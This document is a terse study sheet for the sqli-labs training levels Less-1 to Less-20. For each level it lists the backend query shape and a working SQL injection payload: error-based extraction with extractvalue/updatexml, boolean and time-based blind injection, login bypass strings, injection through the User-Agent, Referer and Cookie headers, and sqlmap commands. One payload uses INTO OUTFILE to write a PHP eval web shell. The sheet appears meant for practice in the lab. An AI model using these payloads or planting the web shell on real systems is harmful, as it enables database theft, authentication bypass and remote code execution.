Less-1:
select * from table where id='1' limit 0,1;
Less-2:
select * from table where id=1 limit 0,1;
Less-3:
select * from table where id=('1') limit 0,1;
Less-4:
select * from table where id=("1") limit 0,1;
盲注:
Less-5:
select * from table where id='1' limit 0,1;
and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23
Less-6:
select * from table where id="1" limit 0,1;
Less-7:
select * from table where id=(('1')) limit 0,1;
and left(version(),1)=5%23
show variables like '%secure%';
my.ini>>secure_file_priv="/"
union select 1,2,<?php @eval($_POST["x"])?> into outfile *"path"%23
Less-8:
select * from table where id='1' limit 0,1;
基于时间盲注:
Less-9:
select * from table where id='1' limit 0,1;
and sleep(5)%23
and if(ascii(substr(database(),0,1))=115,0,sleep(5))%23
Less-10:
select * from table where id="1" limit 0,1;
POST:
Less-11:
select * from table where username='admin' and password='admin' limit 0,1;
admin' or '1'='1#
1' union select 1,database()#
sqlmap --form
Less-12:
select * from table where username=("admin") and password=("admin") limit 0,1;
admin") or 1=1#
admin") or ("1")=("1#
盲注:
Less-13:
select * from table where username=('admin') and password=('admin') limit 0,1;
and extractvalue(1,concat(0x7e,(select version()),0x7e))#
Less-14:
select * from table where username="admin" and password="admin" limit 0,1;
Less15:(无法报错)
select * from table where username='admin' and password='admin' limit 0,1;
Less-16:
select * from table where username=("admin") and password=("admin") limit 0,1;
Less-17:(uname设置过滤)
update table set password='admin' where username='admin';
&passwd=admin'and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
sqlmap --data "uname=admin&passwd=admin&submit=Submit"
Less-18:
(uname,passwd设置过滤)
insert into table(a,b,c) values('user-agent','ip','uname');
'and '1'='1
'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1
sqlmap -r xx.txt --technique E
Less-19:
insert into table(a,b) values('referer','ip');
referer出注入
Less-20:
select * from table where user='cookie' limit 0,1;
cookie处注入